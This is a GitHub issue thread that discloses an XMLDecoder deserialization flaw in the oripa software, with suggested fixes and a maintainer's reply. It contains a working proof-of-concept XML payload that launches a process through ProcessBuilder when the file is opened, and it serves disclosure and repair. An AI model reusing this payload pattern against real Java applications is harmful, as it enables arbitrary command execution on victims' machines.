### ISSUE TITLE
There is an XMLDecoder reflection vulnerability

### ISSUE THREAD

**Issue by AfterSnows** [oripa/oripa#355]
open the software, select the open option of FiLE, select the malicious xml to trigger

```
<java>
    <object class="java.lang.ProcessBuilder">
        <array class="java.lang.String" length="1" >
            <void index="0">
                <string>calc</string>
            </void>
        </array>
        <void method="start"/>
    </object>
</java>
```

![~8UJ$O`Q0825`EZC~%UZ5CX](https://github.com/oripa/oripa/assets/93036180/d3c64456-5e3b-4b2d-a31f-c1806785bd61)

Fix measures: do not use XMLDecoder to read files directly, implement a validate function, before the execution of XML decoding (XMLDecoder), check the InputStream object filter, learn the weblogic repair way

**Comment by Ooouch1** [comment]
Awful...

I'm considering to write a dedicated decoder using `javax.xml.xpath`.
